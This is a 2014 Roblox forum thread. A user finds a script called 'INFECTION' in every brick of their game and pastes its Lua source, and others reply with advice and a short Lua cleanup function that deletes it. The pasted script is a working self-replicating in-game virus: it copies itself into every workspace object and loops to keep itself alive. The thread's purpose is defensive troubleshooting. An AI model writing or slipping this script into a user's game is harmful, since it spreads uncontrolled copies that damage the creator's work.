Smeak
|
  |
| Joined: 13 May 2012 |
| Total Posts: 383 |
|
|
| 30 Jul 2014 01:06 PM |
THERES SOME THING IN EACH OF THE BRICKS THAT SAY "INFECTION"
I OPENED INFECTION AND THIS IS THERE:
if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "INfecTION" script.Parent = p end
function check() local list = workspace:GetChildren() for i = 1, #list do if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end
while true do check() if workspace:findFirstChild("inFECtion") == nil then local main = script.Parent:Clone() main.Name = "inFECtion" main.Parent = workspace end wait(3) end
AND THEY ALL HAVE FIRE IN EACH OF THE BRICKS!
I AM USING NO FREE MODELS EITHER, JUST BUILD KITS AND BUILD TOOLS! |
|
|
| Report Abuse |
|
|
|
| 30 Jul 2014 01:07 PM |
1. Check for any plugins you installed 2. Install kaspersky plugin. |
|
|
| Report Abuse |
|
|
|
| 30 Jul 2014 01:09 PM |
Why don't you just delete the script? ============== Screw this, I ain't usin no siggy until Roblox gets an official siggy system. |
|
|
| Report Abuse |
|
|
|
| 30 Jul 2014 01:10 PM |
-- Use Norton Anti_Virus
function Norton_Anti_Virus(clean) for _,v in pairs(clean:GetChildren())do if v.Name == "inFECtion" then v:Destroy() elseif #v:GetChildren() > 0 then Norton_Anti_Virus(v) end end end
Norton_Anti_Virus(workspace) |
|
|
| Report Abuse |
|
|
|
| 30 Jul 2014 01:10 PM |
| Deleting the script does no good. |
|
|
| Report Abuse |
|
|
Smeak
|
  |
| Joined: 13 May 2012 |
| Total Posts: 383 |
|
| |
|